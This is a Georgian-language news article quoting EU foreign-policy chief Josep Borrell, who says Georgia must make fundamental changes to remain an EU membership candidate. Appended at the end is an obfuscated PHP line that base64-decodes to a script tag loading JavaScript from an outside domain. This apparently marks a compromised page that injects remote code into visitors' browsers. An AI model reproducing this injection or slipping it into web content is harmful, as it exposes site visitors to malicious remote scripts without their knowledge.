celsiusi
ავერსი შნაიდერი

ევროკავშირის უმაღლესი წარმომადგენლის, ჯოზეფ ბორელის თქმით, იმისთვის, რომ საქართველო ევროკავშირის წევრობის კანდიდატად კვლავ განიხილებოდეს, ქვეყნის ხელისუფლებამ ძირეული ცვლილებები უნდა დანერგოს.

ამის შესახებ ბორელმა უკრაინაში ოფიციალური ვიზიტისას, ადგილობრივ მედიასთან ისაუბრა, როდესაც ჟურნალისტმა საქართველოს, უკრაინასა და მოლდოვას შორის მსგავსების დასახელება სთხოვა.

"საქართველოსა და უკრაინას შორის მსგავსებას ვერ ვხედავ, საერთოდ ვერა. უკრაინის პრეზიდენტი და ხელისუფლება სრულადაა ჩართული ევროკავშირის წევრობაში, ისევე როგორც უკრაინის საზოგადოება. არ არსებობს არავითარი ეჭვი, რომ ქვეყანას ევროკავშირის წევრობა სურს.

საქართველოს შემთხვევაში, ეს ასე აშკარად არ არის. საქართველოს ხელისუფლებას, მთავრობას, დიდი ხანია ვეუბნებით, რომ ევროპული გზიდან გადაუხვიეს. ვეუბნებით, რომ თუ სურთ ევროკავშირის წევრი გახდნენ, უნდა შეცვალონ კანონი, რომელიც მიიღეს, გამოასწორონ აშკარა პრობლემები, რომლებიც საარჩევნო პროცესში გამოიკვეთა და დაუბრუნდნენ ევროპულ გზას.

იმისთვის, რომ ევროკავშირის კანდიდატად მაინც განიხილებოდნენ, საქართველოს ძირეული ცვლილებები სჭირდება", - განაცხადა ბორელმა European Pravda-სთან ინტერვიუში.

ევროკავშირის უმაღლესი წარმომადგენელი საგარეო პოლიტიკისა და უსაფრთხოების საკითხებში უკრაინაში ოფიციალური ვიზიტით ბოლოჯერ იმყოფება - მინისტრმა უკრაინის თავდაცვის მინისტრთან 45 მილიონ -ევროიანი სამხედრო დახმარება და გაყინული რუსული აქტივებიდან 400 მილიონ -ევროიანი მხარდაჭერა განიხილა.

65
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");